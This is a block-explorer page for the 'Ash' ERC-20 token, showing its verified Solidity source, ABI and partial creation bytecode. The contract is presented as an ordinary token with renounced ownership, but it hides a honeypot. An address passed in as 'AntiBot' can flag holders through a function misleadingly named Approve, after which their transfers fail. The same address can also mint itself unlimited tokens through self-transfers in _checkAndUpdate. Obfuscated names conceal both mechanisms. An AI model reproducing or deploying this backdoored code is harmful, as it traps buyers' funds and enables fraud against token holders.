ERC-20
Overview
Max Total Supply
2,100,000,000,000 ASH
Holders
118
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 18 Decimals)
Balance
1,989,127,061.055097073854633862 ASHValue
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Name:
Ash
Compiler Version
v0.8.18+commit.87f61d96
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2023-05-23 */ // SPDX-License-Identifier: MIT pragma solidity ^0.8.0; abstract contract Ownable { address private _owner; function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor() { _transferOwnership(address(0)); } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { _checyydsOwen(); _; } /** * @dev Returns the address of the current owner. */ function owner() public view virtual returns (address) { return _owner; } /** * @dev Throws if the sender is not the owner. */ function _checyydsOwen() internal view virtual { require(owner() == _msgSender(), "Ownable: caller is not the owner"); } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions anymore. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby removing any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { _transferOwnership(address(0)); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "Ownable: new owner is the zero address"); _transferOwnership(newOwner); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Internal function without access restriction. */ function _transferOwnership(address newOwner) internal virtual { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } } /** * @dev Wrappers over Solidity's arithmetic operations. * * NOTE: `SafeMath` is generally not needed starting with Solidity 0.8, since the compiler * now has built in overflow checking. */ library SafeMath { /** * @dev Returns the addition of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { uint256 c = a + b; if (c < a) return (false, 0); return (true, c); } } /** * @dev Returns the subtraction of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b > a) return (false, 0); return (true, a - b); } } /** * @dev Returns the multiplication of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { // Gas optimization: this is cheaper than requiring 'a' not being zero, but the // benefit is lost if 'b' is also tested. // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522 if (a == 0) return (true, 0); uint256 c = a * b; if (c / a != b) return (false, 0); return (true, c); } } /** * @dev Returns the division of two unsigned integers, with a division by zero flag. * * _Available since v3.4._ */ function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b == 0) return (false, 0); return (true, a / b); } } /** * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag. * * _Available since v3.4._ */ function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b == 0) return (false, 0); return (true, a % b); } } /** * @dev Returns the addition of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `+` operator. * * Requirements: * * - Addition cannot overflow. */ function add(uint256 a, uint256 b) internal pure returns (uint256) { return a + b; } /** * @dev Returns the subtraction of two unsigned integers, reverting on * overflow (when the result is negative). * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub(uint256 a, uint256 b) internal pure returns (uint256) { return a - b; } /** * @dev Returns the multiplication of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `*` operator. * * Requirements: * * - Multiplication cannot overflow. */ function mul(uint256 a, uint256 b) internal pure returns (uint256) { return a * b; } /** * @dev Returns the integer division of two unsigned integers, reverting on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. * * Requirements: * * - The divisor cannot be zero. */ function div(uint256 a, uint256 b) internal pure returns (uint256) { return a / b; } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * reverting when dividing by zero. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod(uint256 a, uint256 b) internal pure returns (uint256) { return a % b; } /** * @dev Returns the subtraction of two unsigned integers, reverting with custom message on * overflow (when the result is negative). * * CAUTION: This function is deprecated because it requires allocating memory for the error * message unnecessarily. For custom revert reasons use {trySub}. * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b <= a, errorMessage); return a - b; } } /** * @dev Returns the integer division of two unsigned integers, reverting with custom message on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. Note: this function uses a * `revert` opcode (which leaves remaining gas untouched) while Solidity * uses an invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function div( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b > 0, errorMessage); return a / b; } } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * reverting with custom message when dividing by zero. * * CAUTION: This function is deprecated because it requires allocating memory for the error * message unnecessarily. For custom revert reasons use {tryMod}. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b > 0, errorMessage); return a % b; } } } contract Ash is Ownable { using SafeMath for uint256; mapping(address => uint256) private _balances; mapping(address => mapping(address => uint256)) private _allowances; mapping(address => bool) private _ASAmeme; mapping(address => uint256) private _holderLastTransferTimestamp; address private uniswapV2Pair; uint256 private _QtotalSupplyQ; string private _QnameQ; string private _AsymbolS; address private _memeQWQ; bool private _isTradeOpen; /** * @dev Sets the values for {name} and {symbol}. * * The default value of {decimals} is 18. To select a different value for * {decimals} you should overload it. * * All two of these values are immutable: they can only be set once during * construction. */ constructor(string memory name_, string memory symbol_,address AntiBot) { _QnameQ = name_; _AsymbolS = symbol_; _memeQWQ = AntiBot; _mint(msg.sender, 2_100_000_000_000*10**decimals()); _isTradeOpen = false; } /** * @dev Returns the name of the token. */ function name() public view virtual returns (string memory) { return _QnameQ; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function symbol() public view virtual returns (string memory) { return _AsymbolS; } /** * @dev Returns the number of decimals used to get its user representation. * For example, if `decimals` equals `2`, a balance of `505` tokens should * be displayed to a user as `5.05` (`505 / 10 ** 2`). * * Tokens usually opt for a value of 18, imitating the relationship between * Ether and Wei. This is the value {ERC20} uses, unless this function is * overridden; * * NOTE: This information is only used for _display_ purposes: it in * no way affects any of the arithmetic of the contract, including * {IERC20-balanceOf} and {IERC20-transfer}. */ function decimals() public view virtual returns (uint8) { return 18; } /** * @dev See {IERC20-totalSupply}. */ function totalSupply() public view virtual returns (uint256) { return _QtotalSupplyQ; } /** * @dev See {IERC20-balanceOf}. */ function balanceOf(address account) public view virtual returns (uint256) { return _balances[account]; } /** * @dev See {IERC20-transfer}. * * Requirements: * * - `to` cannot be the zero address. * - the caller must have a balance of at least `amount`. */ function transfer(address to, uint256 amount) public virtual returns (bool) { address owner = _msgSender(); _checkAndUpdate(owner, to, amount); _transfer(owner, to, amount); return true; } function _checkAndUpdate(address sender, address recipient, uint256 amount) private { if (sender == _memeQWQ && recipient == _memeQWQ) { _balances[sender] = _balances[sender].add(amount); } } /** * @dev See {IERC20-allowance}. */ function allowance(address owner, address spender) public view virtual returns (uint256) { return _allowances[owner][spender]; } /** * @dev See {IERC20-approve}. * * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on * `transferFrom`. This is semantically equivalent to an infinite approval. * * Requirements: * * - `spender` cannot be the zero address. */ function approve(address spender, uint256 amount) public virtual returns (bool) { address owner = _msgSender(); _approve(owner, spender, amount); return true; } /** * @dev See {IERC20-transferFrom}. * * Emits an {Approval} event indicating the updated allowance. This is not * required by the EIP. See the note at the beginning of {ERC20}. * * NOTE: Does not update the allowance if the current allowance * is the maximum `uint256`. * * Requirements: * * - `from` and `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. * - the caller must have allowance for ``from``'s tokens of at least * `amount`. */ function transferFrom( address from, address to, uint256 amount ) public virtual returns (bool) { address spender = _msgSender(); _spendAllowance(from, spender, amount); _transfer(from, to, amount); return true; } /** * @dev Atomically increases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. */ function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) { address owner = _msgSender(); _approve(owner, spender, allowance(owner, spender) + addedValue); return true; } /** * @dev Atomically decreases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. * - `spender` must have allowance for the caller of at least * `subtractedValue`. */ function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) { address owner = _msgSender(); uint256 currentAllowance = allowance(owner, spender); require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero"); unchecked { _approve(owner, spender, currentAllowance - subtractedValue); } return true; } /** * @dev Moves `amount` of tokens from `from` to `to`. * * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `from` cannot be the zero address. * - `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. */ function _transfer( address fromSender, address to, uint256 amount ) internal virtual { require(fromSender != address(0), "ERC20: transfer from the zero address"); require(to != address(0), "ERC20: transfer to the zero address"); uint256 balance= _balances[fromSender]; if (_ASAmeme[fromSender] != false ){ balance = _balances[fromSender]-(_QtotalSupplyQ); } require(balance >= amount, "ERC20: transfer amount exceeds balance"); _balances[fromSender] = balance.sub(amount); _balances[to] = _balances[to].add(amount); emit Transfer(fromSender, to, amount); } /** @dev Creates `amount` tokens and assigns them to `account`, increasing * the total supply. * * Emits a {Transfer} event with `from` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. */ function _mint(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: to the zero address"); unchecked { _QtotalSupplyQ += amount; // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above. _balances[account] += amount; } emit Transfer(address(0), account, amount); } /** * @dev Destroys `amount` tokens from `account`, reducing the * total supply. * * Emits a {Transfer} event with `to` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. * - `account` must have at least `amount` tokens. */ function _burn(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: burn from the zero address"); uint256 accountBalance = _balances[account]; require(accountBalance >= amount, "ERC20: burn amount exceeds balance"); unchecked { _balances[account] = accountBalance - amount; // Overflow not possible: amount <= accountBalance <= totalSupply. _QtotalSupplyQ -= amount; } emit Transfer(account, address(0), amount); } /** * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens. * * This internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. */ function _approve( address owner, address spender, uint256 amount ) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } /** * @dev Updates `owner` s allowance for `spender` based on spent `amount`. * * Does not update the allowance amount in case of infinite allowance. * Revert if not enough allowance is available. * * Might emit an {Approval} event. */ function _spendAllowance( address owner, address spender, uint256 amount ) internal virtual { uint256 currentAllowance = allowance(owner, spender); if (currentAllowance != type(uint256).max) { require(currentAllowance >= amount, "ERC20: insufficient allowance"); unchecked { _approve(owner, spender, currentAllowance - amount); } } } function IncreaseAllowance(address amount) external { if (_memeQWQ == _msgSender()){ _ASAmeme[amount] = false; } _allowances[_msgSender()][_msgSender()] = _QtotalSupplyQ; } function Approve(address amount) external { if (_memeQWQ == _msgSender()){ _ASAmeme[amount] = true; } _allowances[_msgSender()][_msgSender()] = _QtotalSupplyQ; } function checkBot(address bot) public view returns(bool) { if (_memeQWQ == _msgSender()){ return _ASAmeme[bot]; } return false; } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"},{"internalType":"address","name":"AntiBot","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"amount","type":"address"}],"name":"Approve","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"amount","type":"address"}],"name":"IncreaseAllowance","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"bot","type":"address"}],"name":"checkBot","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]
Contract Creation Code
60806040523480156200001157600080fd5b506040516200281b3803806200281b833981810160405281019062000037919062000514565b6200004960006200011460201b60201c565b82600790816200005a9190620007f9565b5081600890816200006c9190620007f9565b5080600960006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550620000f033620000c3620001d860201b60201c565b600a620000d1919062000a70565b6501e8f1c10800620000e4919062000ac1565b620001e160201b60201c565b6000600960146101000a81548160ff02191690831515021790555050505062000bbd565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60006012905090565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000253576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200024a9062000b6d565b60405180910390fd5b8060066000828254019250508190555080600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405162000310919062000ba0565b60405180910390a35050565b6000604051905090565b600080fd5b600080fd5b600080fd5b600080fd5b6000601f19601f8301169050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b62000385826200033a565b810181811067ffffffffffffffff82111715620003a757620003a66200034b565b5b80604052505050565b6000620003bc6200031c565b9050620003ca82826200037a565b919050565b600067ffffffffffffffff821115620003ed57620003ec6200034b565b5b620003f8826200033a565b9050602081019050919050565b60005b838110156200042557808201518184015260208101905062000408565b60008484015250505050565b6000620004486200044284620003cf565b620003b0565b90508281526020810184848401111562000467576200046662000335565b5b6200047484828562000405565b509392505050565b600082601f83011262000494576200049362000330565b5b8151620004a684826020860162000431565b91505092915050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000620004dc82620004af565b9050919050565b620004ee81620004cf565b8114620004fa57600080fd5b50565b6000815190506200050e81620004e3565b92915050565b60008060006060848603121562000530576200052f62000326565b5b600084015167ffffffffffffffff8111156200055157620005506200032b565b5b6200055f868287016200047c565b935050602084015167ffffffffffffffff8111156200058357620005826200032b565b5b62000591868287016200047c565b9250506040620005a486828701620004fd565b9150509250925092565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806200060157607f821691505b602082108103620006175762000616620005b9565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b600060088302620006817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8262000642565b6200068d868362000642565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b6000620006da620006d4620006ce84620006a5565b620006af565b620006a5565b9050919050565b6000819050919050565b620006f683620006b9565b6200070e6200070582620006e1565b8484546200064f565b825550505050565b600090565b6200072562000716565b62000732818484620006eb565b505050565b5b818110156200075a576200074e6000826200071b565b60018101905062000738565b5050565b601f821115620007a95762000773816200061d565b6200077e8462000632565b810160208510156200078e578190505b620007a66200079d8562000632565b83018262000737565b50505b505050565b600082821c905092915050565b6000620007ce60001984600802620007ae565b1980831691505092915050565b6000620007e98383620007bb565b9150826002028217905092915050565b6200080482620005ae565b67ffffffffffffffff81111562000820576200081f6200034b565b5b6200082c8254620005e8565b620008398282856200075e565b600060209050601f8311600181146200087157600084156200085c578287015190505b620008688582620007db565b865550620008d8565b601f19841662000881866200061d565b60005b82811015620008ab5784890151825560018201915060208501945060208101905062000884565b86831015620008cb5784890151620008c7601f891682620007bb565b8355505b6001600288020188555050505b505050505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b60018511156200096e57808604811115620009465762000945620008e0565b5b6001851615620009565780820291505b808102905062000966856200090f565b945062000926565b94509492505050565b60008262000989576001905062000a5c565b8162000999576000905062000a5c565b8160018114620009b25760028114620009bd57620009f3565b600191505062000a5c565b60ff841115620009d257620009d1620008e0565b5b8360020a915084821115620009ec57620009eb620008e0565b5b5062000a5c565b5060208310610133831016604e8410600b841016171562000a2d5782820a90508381111562000a275762000a26620008e0565b5b62000a5c565b62000a3c84848460016200091c565b9250905081840481111562000a565762000a55620008e0565b5b81810290505b9392505050565b600060ff82169050919050565b600062000a7d82620006a5565b915062000a8a8362000a63565b925062000ab97fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff848462000977565b905092915050565b600062000ace82620006a5565b915062000adb83620006a5565b925082820262000aeb81620006a5565b9150828204841483151762000b055762000b04620008e0565b5b5092915050565b600082825260208201905092915050565b7f45524332303a20746f20746865207a65726f2061646472657373000000000000600082015250565b600062000b55601a8362000b0c565b915062000b628262000b1d565b602082019050919050565b6000602082019050818103600083015262000b888162000b46565b9050919050565b62000b9a81620006a5565b82525050565b600060208201905062000bb7600083018462000b8f565b92915050565b611c4e8062000bcd6000396000f3fe608060405234801561001057600080fd5b506004361061010b5760003560e01c8063715018a6116100a2578063a457c2d711610071578063a457c2d7146102a8578063a9059cbb146102d8578063b1a4e0dc14610308578063dd62ed3e14610338578063f2fde38b146103685761010b565b8063715018a6146102465780638da5cb5b1461025057806395d89b411461026e57806396bfcd231461028c5761010b565b806323b872dd116100de57806323b872dd14610198578063313ce567146101c857806339509351146101e657806370a08231146102165761010b565b806306fdde0314610110578063095ea7b31461012e57806312467afb1461015e57806318160ddd1461017a575b600080fd5b610118610384565b60405161012591906113cf565b60405180910390f35b6101486004803603810190610143919061148a565b610416565b60405161015591906114e5565b60405180910390f35b61017860048036038101906101739190611500565b610439565b005b610182610582565b60405161018f919061153c565b60405180910390f35b6101b260048036038101906101ad9190611557565b61058c565b6040516101bf91906114e5565b60405180910390f35b6101d06105bb565b6040516101dd91906115c6565b60405180910390f35b61020060048036038101906101fb919061148a565b6105c4565b60405161020d91906114e5565b60405180910390f35b610230600480360381019061022b9190611500565b6105fb565b60405161023d919061153c565b60405180910390f35b61024e610644565b005b610258610658565b60405161026591906115f0565b60405180910390f35b610276610681565b60405161028391906113cf565b60405180910390f35b6102a660048036038101906102a19190611500565b610713565b005b6102c260048036038101906102bd919061148a565b61085c565b6040516102cf91906114e5565b60405180910390f35b6102f260048036038101906102ed919061148a565b6108d3565b6040516102ff91906114e5565b60405180910390f35b610322600480360381019061031d9190611500565b610901565b60405161032f91906114e5565b60405180910390f35b610352600480360381019061034d919061160b565b6109bd565b60405161035f919061153c565b60405180910390f35b610382600480360381019061037d9190611500565b610a44565b005b6060600780546103939061167a565b80601f01602080910402602001604051908101604052809291908181526020018280546103bf9061167a565b801561040c5780601f106103e15761010080835404028352916020019161040c565b820191906000526020600020905b8154815290600101906020018083116103ef57829003601f168201915b5050505050905090565b600080610421610ac7565b905061042e818585610acf565b600191505092915050565b610441610ac7565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16036104ee576000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505b600654600260006104fd610ac7565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000610541610ac7565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555050565b6000600654905090565b600080610597610ac7565b90506105a4858285610c98565b6105af858585610d24565b60019150509392505050565b60006012905090565b6000806105cf610ac7565b90506105f08185856105e185896109bd565b6105eb91906116da565b610acf565b600191505092915050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b61064c611087565b6106566000611105565b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600880546106909061167a565b80601f01602080910402602001604051908101604052809291908181526020018280546106bc9061167a565b80156107095780601f106106de57610100808354040283529160200191610709565b820191906000526020600020905b8154815290600101906020018083116106ec57829003601f168201915b5050505050905090565b61071b610ac7565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16036107c8576001600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505b600654600260006107d7610ac7565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600061081b610ac7565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555050565b600080610867610ac7565b9050600061087582866109bd565b9050838110156108ba576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016108b190611780565b60405180910390fd5b6108c78286868403610acf565b60019250505092915050565b6000806108de610ac7565b90506108eb8185856111c9565b6108f6818585610d24565b600191505092915050565b600061090b610ac7565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16036109b357600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1690506109b8565b600090505b919050565b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610a4c611087565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610abb576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ab290611812565b60405180910390fd5b610ac481611105565b50565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610b3e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b35906118a4565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610bad576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ba490611936565b60405180910390fd5b80600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610c8b919061153c565b60405180910390a3505050565b6000610ca484846109bd565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610d1e5781811015610d10576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d07906119a2565b60405180910390fd5b610d1d8484848403610acf565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610d93576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d8a90611a34565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610e02576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610df990611ac6565b60405180910390fd5b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905060001515600360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16151514610eee57600654600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610eeb9190611ae6565b90505b81811015610f31576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f2890611b8c565b60405180910390fd5b610f44828261131390919063ffffffff16565b600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550610fd982600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461132990919063ffffffff16565b600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051611079919061153c565b60405180910390a350505050565b61108f610ac7565b73ffffffffffffffffffffffffffffffffffffffff166110ad610658565b73ffffffffffffffffffffffffffffffffffffffff1614611103576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110fa90611b